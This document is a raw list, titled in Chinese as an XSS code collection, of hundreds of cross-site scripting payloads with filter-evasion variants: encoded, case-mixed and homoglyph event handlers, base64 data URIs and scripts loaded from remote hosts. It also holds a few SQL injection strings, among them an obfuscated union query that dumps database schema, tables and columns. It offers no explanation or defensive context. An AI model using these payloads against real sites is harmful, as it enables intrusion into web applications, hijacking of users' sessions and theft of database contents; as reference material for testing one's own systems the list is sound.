xss代码集
</script>"><script>prompt(1)</script>
</ScRiPt>"><ScRiPt>prompt(1)</ScRiPt>
"><img src=x οnerrοr=prompt(1)>
"><svg/οnlοad=prompt(1)>
"><iframe/src=javascript:prompt(1)>
"><h1 οnclick=prompt(1)>Clickme</h1>
"><a href=javascript:prompt(1)>Clickme</a>
"><a href="javascript:confirm%28 1%29">Clickme</a>
"><a href="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+">click</a>
"><textarea autofocus οnfοcus=prompt(1)>
"><a/href=javascript:co\u006efir\u006d("1")>clickme</a>
"><script>co\u006efir\u006d`1`</script>
"><ScRiPt>co\u006efir\u006d`1`</ScRiPt>
"><img src=x οnerrοr=co\u006efir\u006d`1`>
"><svg/οnlοad=co\u006efir\u006d`1`>
"><iframe/src=javascript:co\u006efir\u006d%28 1%29>
"><h1 οnclick=co\u006efir\u006d(1)>Clickme</h1>
"><a href=javascript:prompt%28 1%29>Clickme</a>
"><a href="javascript:co\u006efir\u006d%28 1%29">Clickme</a>
"><textarea autofocus οnfοcus=co\u006efir\u006d(1)>
"><details/οntοggle=co\u006efir\u006d`1`>clickmeonchrome
"><p/id=1%0Aonmousemove%0A=%0Aconfirm`1`>hoveme
"><img/src=x%0Aοnerrοr=prompt`1`>
"><iframe srcdoc="<img src=x:x onerror=alert(1)>">
"><h1/οndrag=co\u006efir\u006d`1`)>DragMe</h1>
<script>alert(1)</script>
<scRipt>alErt(1)</scrIpt>
<img src=x οnerrοr=alert(1)>
<script type=vbscript>MsgBox(0)</script>
a'or 2=2--
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=JaVaScRiPt:alert("XSS")>
<BODY ONLOAD=alert("XSS")>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=" javascript:alert("XSS");">
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND="javascript:alert("XSS")">
<IMG DYNSRC="javascript:alert("XSS")">
<INPUT TYPE="image" DYNSRC="javascript:alert("XSS");">
<BGSOUND SRC="javascript:alert("XSS");">
<br size="&{alert("XSS")}">
<LAYER SRC="http://xss.ha.ckers.org/a.js"></layer>
<LINK REL="stylesheet" HREF="javascript:alert("XSS");">
<IMG SRC="vbscript:msgbox("XSS")">
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert("XSS");">
<IFRAME SRC=javascript:alert("XSS")></IFRAME>
<FRAMESET><FRAME SRC=javascript:alert("XSS")></FRAME></FRAMESET>
<TABLE BACKGROUND="javascript:alert("XSS")">
<DIV STYLE="background-image: url(javascript:alert("XSS"))">
<DIV STYLE="behaviour: url("http://xss.ha.ckers.org/exploit.htc");">
<DIV STYLE="width: expression(alert("XSS"));">
<STYLE>@im\port"\ja\vasc\ript:alert("XSS")";</STYLE>
<IMG STYLE="xss: expre\ssion(alert("XSS"))">
<STYLE TYPE="text/javascript">alert("XSS");</STYLE>
<XML SRC="javascript:alert("XSS");">
"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert("XSS");}</SCRIPT><"
<SCRIPT SRC="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
<IMG SRC="javascript:alert("XSS")"
<SCRIPT a=">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT =">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT a=">" "" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT><SCRIPT "a=">"" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<A HREF=http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D>link</A>
<A HREF=ht://www.google.com/>link</A>
<A HREF=http://google.com/>link</A>
<A HREF=http://www.google.com./>link</A>
<A HREF="javascript:document.location="http://www.google.com/"">link</A>
<A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>
<BASE HREF="javascript:alert("XSS");//">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=# οnmοuseοver="alert("xxs")">
<IMG SRC= οnmοuseοver="alert("xxs")">
<IMG οnmοuseοver="alert("xxs")">
<IMG SRC=/ οnerrοr="alert(String.fromCharCode(88,83,83))"></img>
<img src=x οnerrοr="javascript:alert('XSS')">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="javascript:alert("XSS");">
<IMG SRC="jav ascript:alert("XSS");">
<IMG SRC="jav
ascript:alert("XSS");">
<IMG SRC="jav
ascript:alert("XSS");">
<IMG SRC="  javascript:alert("XSS");">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert("XSS")"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert("XSS");//
</script><script>alert("XSS");</script>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B'>
<isindex action=j	a	vas	c	r	ipt:alert(1) type=image>
<marquee/onstart=confirm(2)>
<table background="javascript:alert(1)"></table>
"/><marquee onfinish=confirm(123)>a</marquee>
<svg/οnlοad=prompt(1);>
<isindex action="javas&tab;cript:alert(1)" type=image>
<marquee/onstart=confirm(2)>
/*!00000concat*/(0x63726561746f723a2064705f6d6d78,0x3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d353e44622056657273696f6e203a20,version(),0x3c62723e44622055736572203a20,user(),0x3c62723e3c62723e3c2f666f6e743e3c7461626c6520626f726465723d2231223e3c74686561643e3c74723e3c74683e44617461626173653c2f74683e3c74683e5461626c653c2f74683e3c74683e436f6c756d6e3c2f74683e3c2f74686561643e3c2f74723e3c74626f64793e,(select%20(@x)%20/*!00000from*/%20(select%20(@x:=0x00),(select%20(0)%20/*!00000from*/%20(information_schema/**/.columns)%20where%20(table_schema!=0x696e666f726d6174696f6e5f736368656d61)%20and%20(0x00)%20in%20(@x:=/*!00000concat*/(@x,0x3c74723e3c74643e3c666f6e7420636f6c6f723d7265642073697a653d333e266e6273703b266e6273703b266e6273703b,table_schema,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e266e6273703b266e6273703b266e6273703b,table_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75652073697a653d333e,column_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c2f74723e))))x))
<object%00something allowScriptAccess=always data=//0me.me/demo/xss/flash/normalEmbededXSS.swf?
0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
1 AND (select DCount(last(username)&after=1&after=1) from users where username=ad1min)
1 AND (select DCount(last(username)&after=1&after=1) from users where username='ad1min')
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
<details οntοggle=alert(1)>
<div contextmenu="xss">Right-Click Here<menu id="xss" οnshοw="alert(1)">
<body style="height:1000px" οnwheel="[DATA]">
<div contextmenu="xss">Right-Click Here<menu id="xss" οnshοw="[DATA]">
<body style="height:1000px" οnwheel="prom%25%32%33%25%32%36x70;t(1)">
<div contextmenu="xss">Right-Click Here<menu id="xss" οnshοw="prom%25%32%33%25%32%36x70;t(1)">
<body style="height:1000px" οnwheel="alert(1)">
<div contextmenu="xss">Right-Click Here<menu id="xss" οnshοw="alert(1)">
<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>
<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>
?<input type="search" οnsearch="aler\u0074(1)">
<details οntοggle=alert(1)>
''">
?><script>alert(?X?)</script>
?><script>alert(1)</script>
</ScrIpt><script>alert(1)</script>
"><script>alert(1)</script>
'><script>alert(1)</script>
</ScrIpt><script>alert(1)</script>
' '><script>alert(1)</script>
</ScrIpt><script>alert(1)</script>
"><script>alert(1)</script>
</ScrIpt><script>alert(1)</script>
'><script>alert(1)</script>
</ScrIpt><script>alert(1)</script>
<script>alert(1)</script>
</ScrIpt><script>alert(1)</script>
"><script>alert(1)</script>
</ScrIpt><script>alert(1)</script>
'><script>alert(1)</script>
</ScrIpt><script>alert(1)</script>
" οnerrοr=alert(1) "
" οnerrοr=alert(1) x="
-alert(1)-
-prompt(1)-
<marquee/onstart=confirm(1)>
"><marquee/onstart=confirm(1)>
'><marquee/onstart=confirm(1)>
<img src=x οnerrοr=prompt(1);>
"><img src=x οnerrοr=prompt(1);>
'><img src=x οnerrοr=prompt(1);>
<img src=x οnerrοr=prompt(1)>
"><img src=x οnerrοr=prompt(1)>
'><img src=x οnerrοr=prompt(1)>
'';!--"<X>=&{()}
<SCRIPT>+alert("X");</SCRIPT>
</ScrIpt><SCRIPT>+alert("X");</SCRIPT>
"><SCRIPT>+alert("X");</SCRIPT>
</ScrIpt><SCRIPT>+alert("X");</SCRIPT>
'><SCRIPT>+alert("X");</SCRIPT>
</ScrIpt><SCRIPT>+alert("X");</SCRIPT>
<SCRIPT>+alert("X")</SCRIPT>
</ScrIpt><SCRIPT>+alert("X")</SCRIPT>
"><SCRIPT>+alert("X")</SCRIPT>
</ScrIpt><SCRIPT>+alert("X")</SCRIPT>
'><SCRIPT>+alert("X")</SCRIPT>
</ScrIpt><SCRIPT>+alert("X")</SCRIPT>
<script>alert(/X/)</script>
</ScrIpt><script>alert(/X/)</script>
"><script>alert(/X/)</script>
</ScrIpt><script>alert(/X/)</script>
'><script>alert(/X/)</script>
</ScrIpt><script>alert(/X/)</script>
<svg><script>varmyvar="text";alert(1)//";</script></svg>
"><svg><script>varmyvar="text";alert(1)//";</script></svg>
'><svg><script>varmyvar="text";alert(1)//";</script></svg>
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
"><object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
'><object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
<math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/X.js">click
"><math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/X.js">click
'><math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/X.js">click
<embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>
"><embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>
'><embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>
<script itworksinallbrowsers>/*<script* */alert(1)</script
"><script itworksinallbrowsers>/*<script* */alert(1)</script
'><script itworksinallbrowsers>/*<script* */alert(1)</script
<img src ?itworksonchrome?\/onerror = alert(1)
"><img src ?itworksonchrome?\/onerror = alert(1)
'><img src ?itworksonchrome?\/onerror = alert(1)
<script crossorigin>alert(1);</script>
"><script crossorigin>alert(1);</script>
'><script crossorigin>alert(1);</script>
<script async>alert(1);</script async>
"><script async>alert(1);</script async>
'><script async>alert(1);</script async>
<script charset>alert(1);</script charset>
"><script charset>alert(1);</script charset>
'><script charset>alert(1);</script charset>
<script a b c >alert(1)</script d e f>
"><script a b c >alert(1)</script d e f>
'><script a b c >alert(1)</script d e f>
<img src=x οnerrοr=document.body.innerHTML=location.hash>#"><img src=x οnerrοr=prompt(1)>
"><img src=x οnerrοr=document.body.innerHTML=location.hash>#"><img src=x οnerrοr=prompt(1)>
'><img src=x οnerrοr=document.body.innerHTML=location.hash>#"><img src=x οnerrοr=prompt(1)>
"><img src=x οnerrοr=prompt(1)>
'><img src=x οnerrοr=prompt(1)>
<img src=x οnerrοr=document.body.innerHTML=location.hash>#"><img/src='x'οnerrοr=prompt(1)>
"><img src=x οnerrοr=document.body.innerHTML=location.hash>#"><img/src='x'οnerrοr=prompt(1)>
'><img src=x οnerrοr=document.body.innerHTML=location.hash>#"><img/src='x'οnerrοr=prompt(1)>
<img src=x οnerrοr=document.body.innerHTML=location.hash>#<img src=x οnerrοr=prompt(1)>
"><img src=x οnerrοr=document.body.innerHTML=location.hash>#<img src=x οnerrοr=prompt(1)>
'><img src=x οnerrοr=document.body.innerHTML=location.hash>#<img src=x οnerrοr=prompt(1)>
"><img src=x οnerrοr=prompt(1)>
'><img src=x οnerrοr=prompt(1)>
<img src=x οnerrοr=document.body.innerHTML=location.hash>#<img/src='x'οnerrοr=prompt(1)>
"><img src=x οnerrοr=document.body.innerHTML=location.hash>#<img/src='x'οnerrοr=prompt(1)>
'><img src=x οnerrοr=document.body.innerHTML=location.hash>#<img/src='x'οnerrοr=prompt(1)>
<svg οnlοad=document.body.innerHTML=location.hash>#<img src=x οnerrοr=alert(1)>
"><svg οnlοad=document.body.innerHTML=location.hash>#<img src=x οnerrοr=alert(1)>
'><svg οnlοad=document.body.innerHTML=location.hash>#<img src=x οnerrοr=alert(1)>
<svg οnlοad=document.body.innerHTML=location.hash>#<img src='x'οnerrοr=alert(1)>
"><svg οnlοad=document.body.innerHTML=location.hash>#<img src='x'οnerrοr=alert(1)>
'><svg οnlοad=document.body.innerHTML=location.hash>#<img src='x'οnerrοr=alert(1)>
<svg οnlοad=document.body.innerHTML=location.hash>#<svg οnlοad=prompt(1)>
"><svg οnlοad=document.body.innerHTML=location.hash>#<svg οnlοad=prompt(1)>
'><svg οnlοad=document.body.innerHTML=location.hash>#<svg οnlοad=prompt(1)>
<svg οnlοad=document.body.innerHTML=location.hash>#<svg/οnlοad=prompt(1)>
"><svg οnlοad=document.body.innerHTML=location.hash>#<svg/οnlοad=prompt(1)>
'><svg οnlοad=document.body.innerHTML=location.hash>#<svg/οnlοad=prompt(1)>
--!><svg οnlοad=prompt(1)
eval(((_=!1)+{})[1]+(_+{})[2]+(_+{})[4]+((_=!!1)+{})[1]+(_+{})[0]+((_=>(_))+1)[3]+1+((_=>(_))+1)[5])
eval((_=!0+(()=>0)+!1)[10]+_[11]+_[3]+_[1]+_[0]+_[4]+1+_[5])
<marquee>alert( `X :)`)</marquee>
"><marquee>alert( `X :)`)</marquee>
'><marquee>alert( `X :)`)</marquee>
<"script">"alert(0)"</"script">
"><"script">"alert(0)"</"script">
'><"script">"alert(0)"</"script">
<s[NULL]cript>alert(1)</s[NULL]cript>'>X</a>
"><s[NULL]cript>alert(1)</s[NULL]cript>'>X</a>
'><s[NULL]cript>alert(1)</s[NULL]cript>'>X</a>
<video><source o?UTF-8?Q?n?error="alert(1)">
"><video><source o?UTF-8?Q?n?error="alert(1)">
'><video><source o?UTF-8?Q?n?error="alert(1)">
<body scroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
"><body scroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
'><body scroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<meta charset="x-mac-farsi">??script ??alert(1)//??/script ??
"><meta charset="x-mac-farsi">??script ??alert(1)//??/script ??
'><meta charset="x-mac-farsi">??script ??alert(1)//??/script ??
<x onload'=alert(1)
"><x onload'=alert(1)
'><x onload'=alert(1)
<sc'+'ript>alert(1)</script>
"><sc'+'ript>alert(1)</script>
'><sc'+'ript>alert(1)</script>
<FRAMESET><FRAME RC=""+"javascript:alert('X');"></FRAMESET>
"><FRAMESET><FRAME RC=""+"javascript:alert('X');"></FRAMESET>
'><FRAMESET><FRAME RC=""+"javascript:alert('X');"></FRAMESET>
</script>"//'//<svg%0Aοnlοad=alert(1)//>
"></script>"//'//<svg%0Aοnlοad=alert(1)//>
'></script>"//'//<svg%0Aοnlοad=alert(1)//>
'//</script><svg%20"%0aοnlοad=alert(1)%20//>
</script>'//<svg "%0Aοnlοad=alert(1) //>
"></script>'//<svg "%0Aοnlοad=alert(1) //>
'></script>'//<svg "%0Aοnlοad=alert(1) //>
'//</script><svg "%0Aοnlοad=alert(1)// />
</script>"//'//<svg%0Aοnlοad=alert(1) //>
"></script>"//'//<svg%0Aοnlοad=alert(1) //>
'></script>"//'//<svg%0Aοnlοad=alert(1) //>
</script>'//<svg "%0Aοnlοad=alert(1)// />
"></script>'//<svg "%0Aοnlοad=alert(1)// />
'></script>'//<svg "%0Aοnlοad=alert(1)// />
</script "//'//><svg%0Aοnlοad=alert(1)//>
"></script "//'//><svg%0Aοnlοad=alert(1)//>
'></script "//'//><svg%0Aοnlοad=alert(1)//>
';//</script><svg ";%0Aοnlοad=alert(1)// />#
</script><img src '//"%0Aοnerrοr=alert(1)//
"></script><img src '//"%0Aοnerrοr=alert(1)//
'></script><img src '//"%0Aοnerrοr=alert(1)//
</script><svg οnlοad='-/"/-[alert(1)]//'/>
"></script><svg οnlοad='-/"/-[alert(1)]//'/>
'></script><svg οnlοad='-/"/-[alert(1)]//'/>
</script><img '//"%0Aοnerrοr=alert(1)// src>
"></script><img '//"%0Aοnerrοr=alert(1)// src>
'></script><img '//"%0Aοnerrοr=alert(1)// src>
</script><img '//"%0Aοnerrοr=alert(1)// src=1>
"></script><img '//"%0Aοnerrοr=alert(1)// src=1>
'></script><img '//"%0Aοnerrοr=alert(1)// src=1>
</script "/*'/*><svg */; οnlοad=alert(1) //>
"></script "/*'/*><svg */; οnlοad=alert(1) //>
'></script "/*'/*><svg */; οnlοad=alert(1) //>
</script><script>/*"/*'/**/;alert(1)//</script>#
"></script><script>/*"/*'/**/;alert(1)//</script>#
'></script><script>/*"/*'/**/;alert(1)//</script>#
</script "/*'/*><img/src=x */; οnerrοr=alert(1) //
"></script "/*'/*><img/src=x */; οnerrοr=alert(1) //
'></script "/*'/*><img/src=x */; οnerrοr=alert(1) //
</script><script>/*var a="/*""'/**/;alert(1);//</script>
"></script><script>/*var a="/*""'/**/;alert(1);//</script>
'></script><script>/*var a="/*""'/**/;alert(1);//</script>
<iframe src="data:data:javascript:,% 3 c script % 3 e confirm(1) % 3 c/script %3 e">
"><iframe src="data:data:javascript:,% 3 c script % 3 e confirm(1) % 3 c/script %3 e">
'><iframe src="data:data:javascript:,% 3 c script % 3 e confirm(1) % 3 c/script %3 e">
' style='width:expression(prompt(1));
"width:expression(prompt(1))
width:\0065\0078\0070\0072\0065\0073\0073\0069\006F\006E\0028\0070\0072\006F\006D\0070\0074\0028\0031\0029\0029
javascript:prompt(1)
javascript:\u0070rompt(1)
jAvAsCrIpT:prompt(1)
http://jsfiddle.net/xboz/c7vvkedv/
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
"><EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
'><EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<DIV STYLE="width:\0065\0078\0070\0072\0065\0073\0073\0069\006F\006E\0028\0070\0072\006F\006D\0070\0074\0028\0031\0029\0029">
"><DIV STYLE="width:\0065\0078\0070\0072\0065\0073\0073\0069\006F\006E\0028\0070\0072\006F\006D\0070\0074\0028\0031\0029\0029">
'><DIV STYLE="width:\0065\0078\0070\0072\0065\0073\0073\0069\006F\006E\0028\0070\0072\006F\006D\0070\0074\0028\0031\0029\0029">
data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5wcm9tcHQoMSk8L3NjcmlwdD4=
data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+cHJvbXB0KDEpOzwvc2NyaXB0Pjwvc3ZnPg==
data:text/html;base64,PHNjcmlwdD5wcm9tcHQoMSk8L3NjcmlwdD4=
data:text/html;,<script>prompt(1)</script>
``οnerrοr=prompt(1)
alert(/XSS/);
1;alert(/XSS/);
1';alert(/XSS/);x='1
';alert(/XSS/);'
<svg><script>prompt( 1)</script>
"><svg><script>prompt( 1)</script>
'><svg><script>prompt( 1)</script>
<html> <script> var a="</script><script>alert(1)//";</script> </html>
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(2);</script>
<script\x0Dtype="text/javascript">javascript:alert(3);</script>
<script\x09type="text/javascript">javascript:alert(4);</script>
<script\x0Ctype="text/javascript">javascript:alert(5);</script>
<script\x2Ftype="text/javascript">javascript:alert(6);</script>
<script\x0Atype="text/javascript">javascript:alert(7);</script>
'`"><\x3Cscript>javascript:alert(8)</script>
'`"><\x00script>javascript:alert(9)</script>
<img src=10 href=10 οnerrοr="javascript:alert(10)"></img>
<audio src=11 href=11 οnerrοr="javascript:alert(11)"></audio>
<video src=12 href=12 οnerrοr="javascript:alert(12)"></video>
<body src=13 href=13 οnerrοr="javascript:alert(13)"></body>
<image src=14 href=14 οnerrοr="javascript:alert(14)"></image>
<object src=15 href=15 οnerrοr="javascript:alert(15)"></object>
<script src=16 href=16 οnerrοr="javascript:alert(16)"></script>
<svg onResize svg onResize="javascript:javascript:alert(17)"></svg onResize>
<title onPropertyChange title onPropertyChange="javascript:javascript:alert(18)"></title onPropertyChange>
<iframe onLoad iframe onLoad="javascript:javascript:alert(19)"></iframe onLoad>
<body onMouseEnter body onMouseEnter="javascript:javascript:alert(20)"></body onMouseEnter>
<body onFocus body onFocus="javascript:javascript:alert(21)"></body onFocus>
<frameset onScroll frameset onScroll="javascript:javascript:alert(22)"></frameset onScroll>
<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(23)"></script onReadyStateChange>
<html onMouseUp html onMouseUp="javascript:javascript:alert(24)"></html onMouseUp>
<body onPropertyChange body onPropertyChange="javascript:javascript:alert(25)"></body onPropertyChange>
<svg onLoad svg onLoad="javascript:javascript:alert(26)"></svg onLoad>
<body onPageHide body onPageHide="javascript:javascript:alert(27)"></body onPageHide>
<body onMouseOver body onMouseOver="javascript:javascript:alert(28)"></body onMouseOver>
<body onUnload body onUnload="javascript:javascript:alert(29)"></body onUnload>
<body onLoad body onLoad="javascript:javascript:alert(30)"></body onLoad>
<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(31)"></bgsound onPropertyChange>
<html onMouseLeave html onMouseLeave="javascript:javascript:alert(32)"></html onMouseLeave>
<html onMouseWheel html onMouseWheel="javascript:javascript:alert(33)"></html onMouseWheel>
<style onLoad style onLoad="javascript:javascript:alert(34)"></style onLoad>
<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(35)"></iframe onReadyStateChange>
<body onPageShow body onPageShow="javascript:javascript:alert(36)"></body onPageShow>
<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(37)"></style onReadyStateChange>
<frameset onFocus frameset onFocus="javascript:javascript:alert(38)"></frameset onFocus>
<applet onError applet onError="javascript:javascript:alert(39)"></applet onError>
<marquee onStart marquee onStart="javascript:javascript:alert(40)"></marquee onStart>
<script onLoad script onLoad="javascript:javascript:alert(41)"></script onLoad>
<html onMouseOver html onMouseOver="javascript:javascript:alert(42)"></html onMouseOver>
<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(43)"></html onMouseEnter>
<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(44)"></body onBeforeUnload>
<html onMouseDown html onMouseDown="javascript:javascript:alert(45)"></html onMouseDown>
<marquee onScroll marquee onScroll="javascript:javascript:alert(46)"></marquee onScroll>
<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(47)"></xml onPropertyChange>
<frameset onBlur frameset onBlur="javascript:javascript:alert(48)"></frameset onBlur>
<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(49)"></applet onReadyStateChange>
<svg onUnload svg onUnload="javascript:javascript:alert(50)"></svg onUnload>
<html onMouseOut html onMouseOut="javascript:javascript:alert(51)"></html onMouseOut>
<body onMouseMove body onMouseMove="javascript:javascript:alert(52)"></body onMouseMove>
<body onResize body onResize="javascript:javascript:alert(53)"></body onResize>
<object onError object onError="javascript:javascript:alert(54)"></object onError>
<body onPopState body onPopState="javascript:javascript:alert(55)"></body onPopState>
<html onMouseMove html onMouseMove="javascript:javascript:alert(56)"></html onMouseMove>
<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(57)"></applet onreadystatechange>
<body onpagehide body οnpagehide="javascript:javascript:alert(58)"></body onpagehide>
<svg onunload svg οnunlοad="javascript:javascript:alert(59)"></svg onunload>
<applet onerror applet οnerrοr="javascript:javascript:alert(60)"></applet onerror>
<body onkeyup body οnkeyup="javascript:javascript:alert(61)"></body onkeyup>
<body onunload body οnunlοad="javascript:javascript:alert(62)"></body onunload>
<iframe onload iframe οnlοad="javascript:javascript:alert(63)"></iframe onload>
<body onload body οnlοad="javascript:javascript:alert(64)"></body onload>
<html onmouseover html οnmοuseοver="javascript:javascript:alert(65)"></html onmouseover>
<object onbeforeload object onbeforeload="javascript:javascript:alert(66)"></object onbeforeload>
<body onbeforeunload body οnbefοreunlοad="javascript:javascript:alert(67)"></body onbeforeunload>
<body onfocus body οnfοcus="javascript:javascript:alert(68)"></body onfocus>
<body onkeydown body οnkeydοwn="javascript:javascript:alert(69)"></body onkeydown>
<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(70)"></iframe onbeforeload>
<iframe src iframe src="javascript:javascript:alert(71)"></iframe src>
<svg onload svg οnlοad="javascript:javascript:alert(72)"></svg onload>
<html onmousemove html οnmοusemοve="javascript:javascript:alert(73)"></html onmousemove>
<body onblur body οnblur="javascript:javascript:alert(74)"></body onblur>
\x3Cscript>javascript:alert(75)</script>
'"`><script>/* *\x2Fjavascript:alert(76)// */</script>
<script>javascript:alert(77)</script\x0D
<script>javascript:alert(78)</script\x0A
<script>javascript:alert(79)</script\x0B
<script charset="\x22>javascript:alert(80)</script>
<!--\x3E<img src=xxx:x οnerrοr=javascript:alert(81)> -->
--><!-- ---> <img src=xxx:x οnerrοr=javascript:alert(82)> -->
--><!-- --\x00> <img src=xxx:x οnerrοr=javascript:alert(83)> -->
--><!-- --\x284> <img src=xxx:x οnerrοr=javascript:alert(84)> -->
--><!-- --\x3E> <img src=xxx:x οnerrοr=javascript:alert(85)> -->
`"'><img src='#\x27 οnerrοr=javascript:alert(86)>
<a href="javascript\x3Ajavascript:alert(87)" id="fuzzelement87">test</a>
"'`><p><svg><script>a='hello\x27;javascript:alert(88)//';</script></p>
<a href="javas\x00cript:javascript:alert(89)" id="fuzzelement89">test</a>
<a href="javas\x07cript:javascript:alert(90)" id="fuzzelement90">test</a>
<a href="javas\x0Dcript:javascript:alert(91)" id="fuzzelement91">test</a>
<a href="javas\x0Acript:javascript:alert(92)" id="fuzzelement92">test</a>
<a href="javas\x08cript:javascript:alert(93)" id="fuzzelement93">test</a>
<a href="javas\x02cript:javascript:alert(94)" id="fuzzelement94">test</a>
<a href="javas\x03cript:javascript:alert(95)" id="fuzzelement95">test</a>
